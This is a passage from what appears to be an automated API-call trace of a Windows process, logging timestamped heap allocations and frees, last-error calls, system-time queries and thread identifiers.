SetLastError (dwErrCode=0x0) [0283.500] GetLastError () returned 0x0 [0283.500] SetLastError (dwErrCode=0x0) [0283.501] GetLastError () returned 0x0 [0283.501] SetLastError (dwErrCode=0x0) [0283.501] GetLastError () returned 0x0 [0283.501] SetLastError (dwErrCode=0x0) [0283.502] GetLastError () returned 0x0 [0283.502] SetLastError (dwErrCode=0x0) [0283.502] GetLastError () returned 0x0 [0283.502] SetLastError (dwErrCode=0x0) [0283.503] GetLastError () returned 0x0 [0283.503] SetLastError (dwErrCode=0x0) [0283.504] GetLastError () returned 0x0 [0283.504] SetLastError (dwErrCode=0x0) [0283.504] GetLastError () returned 0x0 [0283.504] SetLastError (dwErrCode=0x0) [0283.505] GetLastError () returned 0x0 [0283.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1e6) returned 0x6aaac0 [0283.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa970 | out: hHeap=0x680000) returned 1 [0283.506] GetLastError () returned 0x0 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a0) returned 0x6aa6f0 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aaac0 | out: hHeap=0x680000) returned 1 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7b08 | out: hHeap=0x680000) returned 1 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7b78 | out: hHeap=0x680000) returned 1 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a0) returned 0x6aa970 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6962d0 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696288 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696240 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6961f8 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6a8620 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a59c8 | out: hHeap=0x680000) returned 1 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6961b0 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x69f360 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696168 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695fb8 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8) returned 0x6aab18 [0283.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69f360 | out: hHeap=0x680000) returned 1 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f70 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5da8 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8) returned 0x6aabf8 [0283.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696318 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696360 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6963a8 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6963f0 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696438 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696480 [0283.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5d58 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa970 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa6f0 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa898 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696318 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696360 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6963a8 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6963f0 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696438 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696480 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d58 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6230 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a45e8 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a45c0 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4638 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4610 | out: hHeap=0x680000) returned 1 [0283.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4688 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4660 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a46d8 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a46b0 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4750 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4728 | out: hHeap=0x680000) returned 1 [0283.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0283.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c340 [0283.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df820 | out: lpSystemTimeAsFileTime=0x2df820*(dwLowDateTime=0x16ad31c0, dwHighDateTime=0x1d60de7)) [0283.509] GetLastError () returned 0x0 [0283.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df85c | out: lpSystemTimeAsFileTime=0x2df85c*(dwLowDateTime=0x16ad31c0, dwHighDateTime=0x1d60de7)) [0283.510] GetLastError () returned 0x0 Thread: id = 59 os_tid = 0x504 Thread: id = 60 os_tid = 0x2ac [0298.497] GetLastError () returned 0x57 [0298.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x28) returned 0x69f580 [0298.497] SetLastError (dwErrCode=0x57) [0298.497] GetLastError () returned 0x57 [0298.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x364) returned 0x6a3928 [0298.497] SetLastError (dwErrCode=0x57) Thread: id = 61 os_tid = 0x778 [0298.533] GetLastError () returned 0x57 [0298.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x28) returned 0x69f5e0 [0298.533] SetLastError (dwErrCode=0x57) [0298.533] GetLastError () returned 0x57 [0298.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x364) returned 0x6a3c98 [0298.534] SetLastError (dwErrCode=0x57)